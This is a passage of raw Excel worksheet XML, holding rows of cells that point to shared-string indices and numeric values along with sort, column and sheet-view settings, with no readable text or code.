    <row r="21389" spans="1:3">
      <c r="A21389" s="1" t="s">
        <v>38044</v>
      </c>
      <c r="B21389" s="1" t="s">
        <v>46557</v>
      </c>
    </row>
    <row r="21390" spans="1:3">
      <c r="A21390" s="1" t="s">
        <v>35281</v>
      </c>
      <c r="B21390" s="1" t="s">
        <v>46294</v>
      </c>
    </row>
    <row r="21391" spans="1:3">
      <c r="A21391" s="1" t="s">
        <v>47757</v>
      </c>
      <c r="B21391" s="1" t="s">
        <v>55640</v>
      </c>
      <c r="C21391" s="29" t="s">
        <v>47758</v>
      </c>
    </row>
    <row r="21392" spans="1:3">
      <c r="A21392" s="1" t="s">
        <v>31791</v>
      </c>
      <c r="B21392" s="1" t="s">
        <v>46167</v>
      </c>
    </row>
    <row r="21393" spans="1:2">
      <c r="A21393" s="1" t="s">
        <v>32550</v>
      </c>
      <c r="B21393" s="1" t="s">
        <v>46186</v>
      </c>
    </row>
    <row r="21394" spans="1:2">
      <c r="A21394" s="1" t="s">
        <v>35385</v>
      </c>
      <c r="B21394" s="1" t="s">
        <v>46373</v>
      </c>
    </row>
    <row r="21395" spans="1:2">
      <c r="A21395" s="1" t="s">
        <v>33516</v>
      </c>
      <c r="B21395" s="1" t="s">
        <v>46253</v>
      </c>
    </row>
    <row r="21396" spans="1:2">
      <c r="A21396" s="1" t="s">
        <v>29471</v>
      </c>
      <c r="B21396" s="1" t="s">
        <v>45956</v>
      </c>
    </row>
    <row r="21397" spans="1:2">
      <c r="A21397" s="1" t="s">
        <v>22450</v>
      </c>
      <c r="B21397" s="1" t="s">
        <v>43313</v>
      </c>
    </row>
    <row r="21398" spans="1:2">
      <c r="A21398" s="1" t="s">
        <v>22452</v>
      </c>
      <c r="B21398" s="1" t="s">
        <v>43315</v>
      </c>
    </row>
    <row r="21399" spans="1:2">
      <c r="A21399" s="1" t="s">
        <v>22451</v>
      </c>
      <c r="B21399" s="1" t="s">
        <v>43314</v>
      </c>
    </row>
    <row r="21400" spans="1:2">
      <c r="A21400" s="1" t="s">
        <v>26669</v>
      </c>
      <c r="B21400" s="1" t="s">
        <v>44981</v>
      </c>
    </row>
    <row r="21401" spans="1:2">
      <c r="A21401" s="1" t="s">
        <v>33517</v>
      </c>
      <c r="B21401" s="1" t="s">
        <v>55641</v>
      </c>
    </row>
    <row r="21402" spans="1:2">
      <c r="A21402" s="1" t="s">
        <v>26082</v>
      </c>
      <c r="B21402" s="1" t="s">
        <v>44778</v>
      </c>
    </row>
    <row r="21403" spans="1:2">
      <c r="A21403" s="1" t="s">
        <v>32891</v>
      </c>
      <c r="B21403" s="1" t="s">
        <v>55642</v>
      </c>
    </row>
    <row r="21404" spans="1:2">
      <c r="A21404" s="33" t="s">
        <v>4431</v>
      </c>
      <c r="B21404" s="33" t="s">
        <v>39657</v>
      </c>
    </row>
    <row r="21405" spans="1:2">
      <c r="A21405" s="1" t="s">
        <v>26075</v>
      </c>
      <c r="B21405" s="1" t="s">
        <v>44773</v>
      </c>
    </row>
    <row r="21406" spans="1:2">
      <c r="A21406" s="1" t="s">
        <v>35040</v>
      </c>
      <c r="B21406" s="1" t="s">
        <v>55643</v>
      </c>
    </row>
    <row r="21407" spans="1:2">
      <c r="A21407" s="1" t="s">
        <v>35680</v>
      </c>
      <c r="B21407" s="1" t="s">
        <v>46385</v>
      </c>
    </row>
    <row r="21408" spans="1:2">
      <c r="A21408" s="1" t="s">
        <v>23219</v>
      </c>
      <c r="B21408" s="1" t="s">
        <v>43631</v>
      </c>
    </row>
    <row r="21409" spans="1:3">
      <c r="A21409" s="1" t="s">
        <v>23321</v>
      </c>
      <c r="B21409" s="1" t="s">
        <v>43677</v>
      </c>
    </row>
    <row r="21410" spans="1:3">
      <c r="A21410" s="1" t="s">
        <v>31880</v>
      </c>
      <c r="B21410" s="1" t="s">
        <v>55644</v>
      </c>
    </row>
    <row r="21411" spans="1:3">
      <c r="A21411" s="1" t="s">
        <v>31106</v>
      </c>
      <c r="B21411" s="1" t="s">
        <v>55645</v>
      </c>
    </row>
    <row r="21412" spans="1:3">
      <c r="A21412" s="1" t="s">
        <v>36196</v>
      </c>
      <c r="B21412" s="1" t="s">
        <v>55646</v>
      </c>
    </row>
    <row r="21413" spans="1:3">
      <c r="A21413" s="1" t="s">
        <v>35676</v>
      </c>
      <c r="B21413" s="1" t="s">
        <v>55647</v>
      </c>
    </row>
    <row r="21414" spans="1:3">
      <c r="A21414" s="1" t="s">
        <v>27636</v>
      </c>
      <c r="B21414" s="1" t="s">
        <v>45384</v>
      </c>
    </row>
    <row r="21415" spans="1:3">
      <c r="A21415" s="1" t="s">
        <v>28832</v>
      </c>
      <c r="B21415" s="1" t="s">
        <v>37219</v>
      </c>
    </row>
    <row r="21416" spans="1:3">
      <c r="A21416" s="1" t="s">
        <v>33969</v>
      </c>
      <c r="B21416" s="1" t="s">
        <v>55648</v>
      </c>
    </row>
    <row r="21417" spans="1:3">
      <c r="A21417" s="33" t="s">
        <v>4190</v>
      </c>
      <c r="B21417" s="33" t="s">
        <v>40827</v>
      </c>
    </row>
    <row r="21418" spans="1:3">
      <c r="A21418" s="52" t="s">
        <v>5205</v>
      </c>
      <c r="B21418" s="52" t="s">
        <v>40187</v>
      </c>
    </row>
    <row r="21419" spans="1:3">
      <c r="A21419" s="31" t="s">
        <v>4527</v>
      </c>
      <c r="B21419" s="31" t="s">
        <v>39302</v>
      </c>
    </row>
    <row r="21420" spans="1:3">
      <c r="A21420" s="1" t="s">
        <v>33883</v>
      </c>
      <c r="B21420" s="1" t="s">
        <v>55649</v>
      </c>
    </row>
    <row r="21421" spans="1:3">
      <c r="A21421" s="1" t="s">
        <v>34521</v>
      </c>
      <c r="B21421" s="1" t="s">
        <v>55650</v>
      </c>
    </row>
    <row r="21422" spans="1:3">
      <c r="A21422" s="1" t="s">
        <v>33247</v>
      </c>
      <c r="B21422" s="1" t="s">
        <v>55651</v>
      </c>
    </row>
    <row r="21423" spans="1:3">
      <c r="A21423" s="1" t="s">
        <v>6710</v>
      </c>
      <c r="B21423" s="1" t="s">
        <v>41540</v>
      </c>
      <c r="C21423" s="29" t="s">
        <v>6187</v>
      </c>
    </row>
    <row r="21424" spans="1:3">
      <c r="A21424" s="1" t="s">
        <v>33884</v>
      </c>
      <c r="B21424" s="1" t="s">
        <v>55652</v>
      </c>
    </row>
    <row r="21425" spans="1:3">
      <c r="A21425" s="1" t="s">
        <v>34516</v>
      </c>
      <c r="B21425" s="1" t="s">
        <v>55653</v>
      </c>
    </row>
    <row r="21426" spans="1:3">
      <c r="A21426" s="52" t="s">
        <v>5416</v>
      </c>
      <c r="B21426" s="52" t="s">
        <v>40575</v>
      </c>
    </row>
    <row r="21427" spans="1:3">
      <c r="A21427" s="1" t="s">
        <v>25747</v>
      </c>
      <c r="B21427" s="1" t="s">
        <v>44643</v>
      </c>
    </row>
    <row r="21428" spans="1:3">
      <c r="A21428" s="1" t="s">
        <v>34661</v>
      </c>
      <c r="B21428" s="1" t="s">
        <v>55654</v>
      </c>
    </row>
    <row r="21429" spans="1:3">
      <c r="A21429" s="52" t="s">
        <v>4849</v>
      </c>
      <c r="B21429" s="52" t="s">
        <v>39481</v>
      </c>
    </row>
    <row r="21430" spans="1:3">
      <c r="A21430" s="1" t="s">
        <v>4028</v>
      </c>
      <c r="B21430" s="1" t="s">
        <v>40768</v>
      </c>
    </row>
    <row r="21431" spans="1:3">
      <c r="A21431" s="1" t="s">
        <v>32091</v>
      </c>
      <c r="B21431" s="1" t="s">
        <v>55655</v>
      </c>
    </row>
    <row r="21432" spans="1:3">
      <c r="A21432" s="1" t="s">
        <v>32090</v>
      </c>
      <c r="B21432" s="1" t="s">
        <v>55656</v>
      </c>
    </row>
    <row r="21433" spans="1:3">
      <c r="A21433" s="67" t="s">
        <v>47247</v>
      </c>
      <c r="B21433" s="59" t="s">
        <v>55993</v>
      </c>
    </row>
    <row r="21434" spans="1:3">
      <c r="A21434" s="1">
        <v>202160</v>
      </c>
      <c r="B21434" s="1">
        <v>202160</v>
      </c>
      <c r="C21434" s="29" t="s">
        <v>58706</v>
      </c>
    </row>
    <row r="21435" spans="1:3">
      <c r="A21435" s="1">
        <v>202161</v>
      </c>
      <c r="B21435" s="1">
        <v>202161</v>
      </c>
      <c r="C21435" s="29" t="s">
        <v>58705</v>
      </c>
    </row>
    <row r="21436" spans="1:3">
      <c r="A21436" s="1">
        <v>235200</v>
      </c>
      <c r="B21436" s="1">
        <v>235200</v>
      </c>
      <c r="C21436" s="29" t="s">
        <v>58704</v>
      </c>
    </row>
    <row r="21437" spans="1:3">
      <c r="A21437" s="1">
        <v>257728</v>
      </c>
      <c r="B21437" s="1">
        <v>257728</v>
      </c>
      <c r="C21437" s="29" t="s">
        <v>47840</v>
      </c>
    </row>
    <row r="21438" spans="1:3">
      <c r="A21438" s="1">
        <v>273260</v>
      </c>
      <c r="B21438" s="1">
        <v>273260</v>
      </c>
      <c r="C21438" s="29" t="s">
        <v>58708</v>
      </c>
    </row>
    <row r="21439" spans="1:3">
      <c r="A21439" s="1">
        <v>505181</v>
      </c>
      <c r="B21439" s="1">
        <v>505181</v>
      </c>
      <c r="C21439" s="29" t="s">
        <v>47367</v>
      </c>
    </row>
    <row r="21440" spans="1:3">
      <c r="A21440" s="1">
        <v>520227</v>
      </c>
      <c r="B21440" s="1">
        <v>520227</v>
      </c>
      <c r="C21440" s="29" t="s">
        <v>47366</v>
      </c>
    </row>
    <row r="21441" spans="1:3">
      <c r="A21441" s="1">
        <v>545010</v>
      </c>
      <c r="B21441" s="1">
        <v>545010</v>
      </c>
      <c r="C21441" s="29" t="s">
        <v>58709</v>
      </c>
    </row>
    <row r="21442" spans="1:3">
      <c r="A21442" s="1">
        <v>589001</v>
      </c>
      <c r="B21442" s="1">
        <v>589001</v>
      </c>
      <c r="C21442" s="29" t="s">
        <v>58707</v>
      </c>
    </row>
    <row r="21443" spans="1:3">
      <c r="A21443" s="1">
        <v>695166</v>
      </c>
      <c r="B21443" s="1">
        <v>695166</v>
      </c>
      <c r="C21443" s="29" t="s">
        <v>28293</v>
      </c>
    </row>
  </sheetData>
  <sortState ref="A1:Z23184">
    <sortCondition ref="B1:B23184"/>
    <sortCondition ref="A1:A23184"/>
  </sortState>
  <phoneticPr fontId="3"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E23321"/>
  <sheetViews>
    <sheetView topLeftCell="A1201" workbookViewId="0">
      <selection activeCell="A1181" sqref="A1181"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="26.75" style="28" customWidth="1"/>
    <col min="2" max="2" width="40.625" style="14" customWidth="1"/>
    <col min="3" max="3" width="9" style="15"/>
    <col min="4" max="31" width="9" style="16"/>
    <col min="32" max="16384" width="9" style="18"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3">
      <c r="A1" s="28" t="s">
        <v>27889</v>
      </c>
      <c r="B1" s="14" t="s">
        <v>7255</v>
      </c>
      <c r="C1" s="15">
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:3">
      <c r="A2" s="28" t="s">
        <v>27890</v>
      </c>
      <c r="B2" s="14" t="s">
        <v>7256</v>
      </c>
      <c r="C2" s="15">
        <v>1</v>
      </c>
    </row>
    <row r="3" spans="1:3">
      <c r="A3" s="28" t="s">
        <v>18840</v>
      </c>
      <c r="B3" s="14" t="s">
        <v>7257</v>
      </c>
      <c r="C3" s="15">
        <v>2</v>
      </c>
    </row>
    <row r="4" spans="1:3">
      <c r="A4" s="28" t="s">
        <v>18841</v>
      </c>
      <c r="B4" s="14" t="s">
        <v>7258</v>
      </c>
      <c r="C4" s="15">
        <v>4</v>
      </c>
    </row>
    <row r="5" spans="1:3">
      <c r="A5" s="28" t="s">
        <v>18842</v>
      </c>
      <c r="B5" s="14" t="s">
        <v>7259</v>
      </c>
      <c r="C5" s="15">
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="1:3">
      <c r="A6" s="28" t="s">
        <v>18843</v>
      </c>
      <c r="B6" s="14" t="s">
        <v>7260</v>
      </c>
      <c r="C6" s="15">
        <v>9</v>
      </c>
    </row>
    <row r="7" spans="1:3">
      <c r="A7" s="28" t="s">
        <v>18844</v>
      </c>
      <c r="B7" s="14" t="s">
        <v>7261</v>
      </c>
      <c r="C7" s="15">
        <v>11</v>
      </c>
    </row>
    <row r="8" spans="1:3">
      <c r="A8" s="28" t="s">
        <v>18845</v>
      </c>
      <c r="B8" s="14" t="s">
        <v>7262</v>
      </c>
      <c r="C8" s="15">
        <v>30</v>
      </c>
    </row>
    <row r="9" spans="1:3">
      <c r="A9" s="28" t="s">
        <v>18846</v>
      </c>
      <c r="B9" s="14" t="s">
        <v>7263</v>
      </c>
      <c r="C9" s="15">
        <v>70</v>
      </c>
    </row>
    <row r="10" spans="1:3">
      <c r="A10" s="28" t="s">
        <v>18847</v>
      </c>
      <c r="B10" s="14" t="s">
        <v>7264</v>
      </c>
      <c r="C10" s="15">
        <v>91</v>
      </c>
    </row>
    <row r="11" spans="1:3">
      <c r="A11" s="28" t="s">
        <v>18848</v>
      </c>
      <c r="B11" s="14" t="s">
        <v>7265</v>
      </c>
      <c r="C11" s="15">
        <v>300</v>
      </c>
    </row>
    <row r="12" spans="1:3">
      <c r="A12" s="28" t="s">
        <v>18849</v>
      </c>
      <c r="B12" s="14" t="s">
        <v>7266</v>
      </c>
      <c r="C12" s="15">
        <v>400</v>
      </c>
    </row>
    <row r="13" spans="1:3">
      <c r="A13" s="28" t="s">
        <v>18850</v>
      </c>
      <c r="B13" s="14" t="s">
        <v>7267</v>
      </c>
      <c r="C13" s="15">
        <v>450</v>
      </c>
    </row>
    <row r="14" spans="1:3">
      <c r="A14" s="28" t="s">
        <v>18851</v>
      </c>
      <c r="B14" s="14" t="s">
        <v>7268</v>
      </c>
      <c r="C14" s="15">
        <v>500</v>
      </c>
    </row>
    <row r="15" spans="1:3">
      <c r="A15" s="28" t="s">
        <v>18852</v>
      </c>
      <c r="B15" s="14" t="s">
        <v>7269</v>
      </c>
      <c r="C15" s="15">
        <v>701</v>
      </c>
    </row>
    <row r="16" spans="1:3">
      <c r="A16" s="28" t="s">
        <v>18853</v>
      </c>
      <c r="B16" s="14" t="s">
        <v>7270</v>
      </c>
      <c r="C16" s="15">
        <v>709</v>
      </c>
    </row>
    <row r="17" spans="1:3">
      <c r="A17" s="28" t="s">
        <v>18854</v>
      </c>
      <c r="B17" s="14" t="s">
        <v>7271</v>
      </c>
      <c r="C17" s="15">
        <v>799</v>
      </c>
    </row>
    <row r="18" spans="1:3">
      <c r="A18" s="28" t="s">
        <v>18855</v>
      </c>
      <c r="B18" s="14" t="s">
        <v>7272</v>
      </c>
      <c r="C18" s="15">
        <v>950</v>
      </c>
    </row>
    <row r="19" spans="1:3">
      <c r="A19" s="28" t="s">
        <v>18856</v>
      </c>
      <c r="B19" s="14" t="s">
        <v>7273</v>
      </c>
      <c r="C19" s="15">
        <v>1040</v>
      </c>
    </row>
    <row r="20" spans="1:3">
      <c r="A20" s="28" t="s">
        <v>18857</v>
      </c>
      <c r="B20" s="14" t="s">
        <v>7274</v>
      </c>
      <c r="C20" s="15">
        <v>1123</v>
      </c>
    </row>
    <row r="21" spans="1:3">
      <c r="A21" s="28" t="s">
        <v>18858</v>
      </c>
      <c r="B21" s="14" t="s">
        <v>7275</v>
      </c>
      <c r="C21" s="15">
        <v>1350</v>
      </c>
    </row>
    <row r="22" spans="1:3">
      <c r="A22" s="28" t="s">
        <v>18859</v>
      </c>
      <c r="B22" s="14" t="s">
        <v>7276</v>
      </c>
      <c r="C22" s="15">
        <v>1500</v>
      </c>
    </row>
    <row r="23" spans="1:3">
      <c r="A23" s="28" t="s">
        <v>18860</v>
      </c>
      <c r="B23" s="14" t="s">
        <v>7277</v>
      </c>
      <c r="C23" s="15">
        <v>1550</v>
      </c>
    </row>
    <row r="24" spans="1:3">
      <c r="A24" s="28" t="s">
        <v>18861</v>
      </c>
      <c r="B24" s="14" t="s">
        <v>7278</v>
      </c>
      <c r="C24" s="15">
        <v>1670</v>
      </c>
    </row>
    <row r="25" spans="1:3">
      <c r="A25" s="28" t="s">
        <v>18862</v>
      </c>
      <c r="B25" s="14" t="s">
        <v>7279</v>
      </c>
      <c r="C25" s="15">
        <v>1850</v>
      </c>
    </row>
    <row r="26" spans="1:3">
      <c r="A26" s="28" t="s">
        <v>18863</v>
      </c>
      <c r="B26" s="14" t="s">
        <v>7280</v>
      </c>
      <c r="C26" s="15">
        <v>1988</v>
      </c>
    </row>
    <row r="27" spans="1:3">
      <c r="A27" s="28" t="s">
        <v>18864</v>
      </c>
      <c r="B27" s="14" t="s">
        <v>7281</v>
      </c>
      <c r="C27" s="15">
        <v>2010</v>
      </c>
    </row>
    <row r="28" spans="1:3">
      <c r="A28" s="28" t="s">
        <v>18865</v>
      </c>
      <c r="B28" s="14" t="s">
        <v>7282</v>
      </c>
      <c r="C28" s="15">
        <v>2011</v>
      </c>
    </row>
    <row r="29" spans="1:3">
      <c r="A29" s="28" t="s">
        <v>18866</v>
      </c>
      <c r="B29" s="14" t="s">
        <v>7283</v>
      </c>
      <c r="C29" s="15">
        <v>2042</v>
      </c>
    </row>
    <row r="30" spans="1:3">
      <c r="A30" s="28" t="s">
        <v>18867</v>
      </c>
      <c r="B30" s="14" t="s">
        <v>7284</v>
      </c>
      <c r="C30" s="15">
        <v>2262</v>
      </c>
    </row>
    <row r="31" spans="1:3">
      <c r="A31" s="28" t="s">
        <v>18868</v>
      </c>
      <c r="B31" s="14" t="s">
        <v>7285</v>
      </c>
      <c r="C31" s="15">
        <v>2896</v>
      </c>
    </row>
    <row r="32" spans="1:3">
      <c r="A32" s="28" t="s">
        <v>18869</v>
      </c>
      <c r="B32" s="14" t="s">
        <v>7286</v>
      </c>
      <c r="C32" s="15">
        <v>3020</v>
      </c>
    </row>
    <row r="33" spans="1:3">
      <c r="A33" s="28" t="s">
        <v>18870</v>
      </c>
      <c r="B33" s="14" t="s">
        <v>7287</v>
      </c>
      <c r="C33" s="15">
        <v>3078</v>
      </c>
    </row>
    <row r="34" spans="1:3">
      <c r="A34" s="28" t="s">
        <v>18871</v>
      </c>
      <c r="B34" s="14" t="s">
        <v>7288</v>
      </c>
      <c r="C34" s="15">
        <v>5133</v>
      </c>
    </row>
    <row r="35" spans="1:3">
      <c r="A35" s="28" t="s">
        <v>18872</v>
      </c>
      <c r="B35" s="14" t="s">
        <v>7289</v>
      </c>
      <c r="C35" s="15">
        <v>5760</v>
      </c>
    </row>
    <row r="36" spans="1:3">
      <c r="A36" s="28" t="s">
        <v>18873</v>
      </c>
      <c r="B36" s="14" t="s">
        <v>7290</v>
      </c>
      <c r="C36" s="15">
        <v>5770</v>
      </c>
    </row>
    <row r="37" spans="1:3">
      <c r="A37" s="28" t="s">
        <v>18874</v>
      </c>
      <c r="B37" s="14" t="s">
        <v>7291</v>
      </c>
      <c r="C37" s="15">
        <v>5780</v>
      </c>
    </row>
    <row r="38" spans="1:3">
      <c r="A38" s="28" t="s">
        <v>18875</v>
      </c>
      <c r="B38" s="14" t="s">
        <v>7292</v>
      </c>
      <c r="C38" s="15">
        <v>5781</v>
      </c>
    </row>
    <row r="39" spans="1:3">
      <c r="A39" s="28" t="s">
        <v>18876</v>
      </c>
      <c r="B39" s="14" t="s">
        <v>7293</v>
      </c>
      <c r="C39" s="15">
        <v>5880</v>
      </c>
    </row>
    <row r="40" spans="1:3">
      <c r="A40" s="28" t="s">
        <v>18877</v>
      </c>
      <c r="B40" s="14" t="s">
        <v>7294</v>
      </c>
      <c r="C40" s="15">
        <v>6008</v>
      </c>
    </row>
    <row r="41" spans="1:3">
      <c r="A41" s="28" t="s">
        <v>18878</v>
      </c>
      <c r="B41" s="14" t="s">
        <v>7295</v>
      </c>
      <c r="C41" s="15">
        <v>6140</v>
      </c>
    </row>
    <row r="42" spans="1:3">
      <c r="A42" s="28" t="s">
        <v>18879</v>
      </c>
      <c r="B42" s="14" t="s">
        <v>7296</v>
      </c>
      <c r="C42" s="15">
        <v>6740</v>
      </c>
    </row>
    <row r="43" spans="1:3">
      <c r="A43" s="28" t="s">
        <v>18880</v>
      </c>
      <c r="B43" s="14" t="s">
        <v>7297</v>
      </c>
      <c r="C43" s="15">
        <v>6780</v>
      </c>
    </row>
    <row r="44" spans="1:3">
      <c r="A44" s="28" t="s">
        <v>18881</v>
      </c>
      <c r="B44" s="14" t="s">
        <v>7298</v>
      </c>
      <c r="C44" s="15">
        <v>6869</v>
      </c>
    </row>
    <row r="45" spans="1:3">
      <c r="A45" s="28" t="s">
        <v>18882</v>
      </c>
      <c r="B45" s="14" t="s">
        <v>7299</v>
      </c>
      <c r="C45" s="15">
        <v>7008</v>
      </c>
    </row>
    <row r="46" spans="1:3">
      <c r="A46" s="28" t="s">
        <v>18883</v>
      </c>
      <c r="B46" s="14" t="s">
        <v>7300</v>
      </c>
      <c r="C46" s="15">
        <v>7030</v>
      </c>
    </row>
    <row r="47" spans="1:3">
      <c r="A47" s="28" t="s">
        <v>18884</v>
      </c>
      <c r="B47" s="14" t="s">
        <v>7301</v>
      </c>
      <c r="C47" s="15">
        <v>7049</v>
      </c>
    </row>
    <row r="48" spans="1:3">
      <c r="A48" s="28" t="s">
        <v>18885</v>
      </c>
      <c r="B48" s="14" t="s">
        <v>7302</v>
      </c>
      <c r="C48" s="15">
        <v>7799</v>
      </c>
    </row>
    <row r="49" spans="1:3">
      <c r="A49" s="28" t="s">
        <v>18886</v>
      </c>
      <c r="B49" s="14" t="s">
        <v>7303</v>
      </c>
      <c r="C49" s="15">
        <v>8007</v>
      </c>
    </row>
    <row r="50" spans="1:3">
      <c r="A50" s="28" t="s">
        <v>18887</v>
      </c>
      <c r="B50" s="14" t="s">
        <v>7304</v>
      </c>
      <c r="C50" s="15">
        <v>8009</v>
      </c>
    </row>
    <row r="51" spans="1:3">
      <c r="A51" s="28" t="s">
        <v>18888</v>
      </c>
      <c r="B51" s="14" t="s">
        <v>7305</v>
      </c>
      <c r="C51" s="15">
        <v>8034</v>
      </c>
    </row>
    <row r="52" spans="1:3">
      <c r="A52" s="28" t="s">
        <v>18889</v>
      </c>
      <c r="B52" s="14" t="s">
        <v>7306</v>
      </c>
      <c r="C52" s="15">
        <v>8700</v>
      </c>
    </row>
    <row r="53" spans="1:3">
      <c r="A53" s="28" t="s">
        <v>18890</v>
      </c>
      <c r="B53" s="14" t="s">
        <v>7307</v>
      </c>
      <c r="C53" s="15">
        <v>8850</v>
      </c>
    </row>
    <row r="54" spans="1:3">
      <c r="A54" s="28" t="s">
        <v>18891</v>
      </c>
      <c r="B54" s="14" t="s">
        <v>7308</v>
      </c>
      <c r="C54" s="15">
        <v>8860</v>
      </c>
    </row>
    <row r="55" spans="1:3">
      <c r="A55" s="28" t="s">
        <v>18892</v>
      </c>
      <c r="B55" s="14" t="s">
        <v>7309</v>
      </c>
      <c r="C55" s="15">
        <v>8884</v>
      </c>
    </row>
    <row r="56" spans="1:3">
      <c r="A56" s="28" t="s">
        <v>18893</v>
      </c>
      <c r="B56" s="14" t="s">
        <v>7310</v>
      </c>
      <c r="C56" s="15">
        <v>9026</v>
      </c>
    </row>
    <row r="57" spans="1:3">
      <c r="A57" s="28" t="s">
        <v>18894</v>
      </c>
      <c r="B57" s="14" t="s">
        <v>7311</v>
      </c>
      <c r="C57" s="15">
        <v>9850</v>
      </c>
    </row>
    <row r="58" spans="1:3">
      <c r="A58" s="28" t="s">
        <v>18895</v>
      </c>
      <c r="B58" s="14" t="s">
        <v>7312</v>
      </c>
      <c r="C58" s="15">
        <v>9863</v>
      </c>
    </row>
    <row r="59" spans="1:3">
      <c r="A59" s="28" t="s">
        <v>18896</v>
      </c>
      <c r="B59" s="14" t="s">
        <v>7313</v>
      </c>
      <c r="C59" s="15">
        <v>9870</v>
      </c>
    </row>
    <row r="60" spans="1:3">
      <c r="A60" s="28" t="s">
        <v>18897</v>
      </c>
      <c r="B60" s="14" t="s">
        <v>7314</v>
      </c>
      <c r="C60" s="15">
        <v>9893</v>
      </c>
    </row>
    <row r="61" spans="1:3">
      <c r="A61" s="28" t="s">
        <v>18898</v>
      </c>
      <c r="B61" s="14" t="s">
        <v>7315</v>
      </c>
      <c r="C61" s="15">
        <v>10000</v>
      </c>
    </row>
    <row r="62" spans="1:3">
      <c r="A62" s="28" t="s">
        <v>18899</v>
      </c>
      <c r="B62" s="14" t="s">
        <v>7316</v>
      </c>
      <c r="C62" s="15">
        <v>10008</v>
      </c>
    </row>
    <row r="63" spans="1:3">
      <c r="A63" s="28" t="s">
        <v>18900</v>
      </c>
      <c r="B63" s="14" t="s">
        <v>7317</v>
      </c>
      <c r="C63" s="15">
        <v>10010</v>
      </c>
    </row>
    <row r="64" spans="1:3">
      <c r="A64" s="28" t="s">
        <v>18901</v>
      </c>
      <c r="B64" s="14" t="s">
        <v>7318</v>
      </c>
      <c r="C64" s="15">
        <v>10050</v>
      </c>
    </row>
    <row r="65" spans="1:3">
      <c r="A65" s="28" t="s">
        <v>18902</v>
      </c>
      <c r="B65" s="14" t="s">
        <v>7319</v>
      </c>
      <c r="C65" s="15">
        <v>10670</v>
      </c>
    </row>
    <row r="66" spans="1:3">
      <c r="A66" s="28" t="s">
        <v>18903</v>
      </c>
      <c r="B66" s="14" t="s">
        <v>7320</v>
      </c>
      <c r="C66" s="15">
        <v>10710</v>
      </c>
    </row>
    <row r="67" spans="1:3">
      <c r="A67" s="28" t="s">
        <v>18904</v>
      </c>
      <c r="B67" s="14" t="s">
        <v>7321</v>
      </c>
      <c r="C67" s="15">
        <v>10799</v>
      </c>
    </row>
    <row r="68" spans="1:3">
      <c r="A68" s="28" t="s">
        <v>1205</v>
      </c>
      <c r="B68" s="14" t="s">
        <v>7322</v>
      </c>
      <c r="C68" s="15">
        <v>10850</v>
      </c>
    </row>
    <row r="69" spans="1:3">
      <c r="A69" s="28" t="s">
        <v>18905</v>
      </c>
      <c r="B69" s="14" t="s">
        <v>7323</v>
      </c>
      <c r="C69" s="15">
        <v>10880</v>
      </c>
    </row>
    <row r="70" spans="1:3">
      <c r="A70" s="28" t="s">
        <v>18906</v>
      </c>
      <c r="B70" s="14" t="s">
        <v>7324</v>
      </c>
      <c r="C70" s="15">
        <v>11911</v>
      </c>
    </row>
    <row r="71" spans="1:3">
      <c r="A71" s="28" t="s">
        <v>18907</v>
      </c>
      <c r="B71" s="14" t="s">
        <v>7325</v>
      </c>
      <c r="C71" s="15">
        <v>12161</v>
      </c>
    </row>
    <row r="72" spans="1:3">
      <c r="A72" s="28" t="s">
        <v>18908</v>
      </c>
      <c r="B72" s="14" t="s">
        <v>7326</v>
      </c>
      <c r="C72" s="15">
        <v>12162</v>
      </c>
    </row>
    <row r="73" spans="1:3">
      <c r="A73" s="28" t="s">
        <v>18909</v>
      </c>
      <c r="B73" s="14" t="s">
        <v>7327</v>
      </c>
      <c r="C73" s="15">
        <v>12323</v>
      </c>
    </row>
    <row r="74" spans="1:3">
      <c r="A74" s="28" t="s">
        <v>18910</v>
      </c>
      <c r="B74" s="14" t="s">
        <v>7328</v>
      </c>
      <c r="C74" s="15">
        <v>12710</v>
      </c>
    </row>
    <row r="75" spans="1:3">
      <c r="A75" s="28" t="s">
        <v>18911</v>
      </c>
      <c r="B75" s="14" t="s">
        <v>7329</v>
      </c>
      <c r="C75" s="15">
        <v>12780</v>
      </c>
    </row>
    <row r="76" spans="1:3">
      <c r="A76" s="28" t="s">
        <v>18912</v>
      </c>
      <c r="B76" s="14" t="s">
        <v>7330</v>
      </c>
      <c r="C76" s="15">
        <v>12851</v>
      </c>
    </row>
    <row r="77" spans="1:3">
      <c r="A77" s="28" t="s">
        <v>18913</v>
      </c>
      <c r="B77" s="14" t="s">
        <v>7331</v>
      </c>
      <c r="C77" s="15">
        <v>12880</v>
      </c>
    </row>
    <row r="78" spans="1:3">
      <c r="A78" s="28" t="s">
        <v>18914</v>
      </c>
      <c r="B78" s="14" t="s">
        <v>7332</v>
      </c>
      <c r="C78" s="15">
        <v>12889</v>
      </c>
    </row>
    <row r="79" spans="1:3">
      <c r="A79" s="28" t="s">
        <v>18915</v>
      </c>
      <c r="B79" s="14" t="s">
        <v>7333</v>
      </c>
      <c r="C79" s="15">
        <v>17849</v>
      </c>
    </row>
    <row r="80" spans="1:3">
      <c r="A80" s="28" t="s">
        <v>18916</v>
      </c>
      <c r="B80" s="14" t="s">
        <v>7334</v>
      </c>
      <c r="C80" s="15">
        <v>17850</v>
      </c>
    </row>
    <row r="81" spans="1:3">
      <c r="A81" s="28" t="s">
        <v>18917</v>
      </c>
      <c r="B81" s="14" t="s">
        <v>7335</v>
      </c>
      <c r="C81" s="15">
        <v>25070</v>
      </c>
    </row>
    <row r="82" spans="1:3">
      <c r="A82" s="28" t="s">
        <v>18918</v>
      </c>
      <c r="B82" s="14" t="s">
        <v>7336</v>
      </c>
      <c r="C82" s="15">
        <v>25230</v>
      </c>
    </row>
    <row r="83" spans="1:3">
      <c r="A83" s="28" t="s">
        <v>18919</v>
      </c>
      <c r="B83" s="14" t="s">
        <v>7337</v>
      </c>
      <c r="C83" s="15">
        <v>25898</v>
      </c>
    </row>
    <row r="84" spans="1:3">
      <c r="A84" s="28" t="s">
        <v>18920</v>
      </c>
      <c r="B84" s="14" t="s">
        <v>7338</v>
      </c>
      <c r="C84" s="15">
        <v>25957</v>
      </c>
    </row>
    <row r="85" spans="1:3">
      <c r="A85" s="28" t="s">
        <v>18921</v>
      </c>
      <c r="B85" s="14" t="s">
        <v>7339</v>
      </c>
      <c r="C85" s="15">
        <v>27039</v>
      </c>
    </row>
    <row r="86" spans="1:3">
      <c r="A86" s="28" t="s">
        <v>18922</v>
      </c>
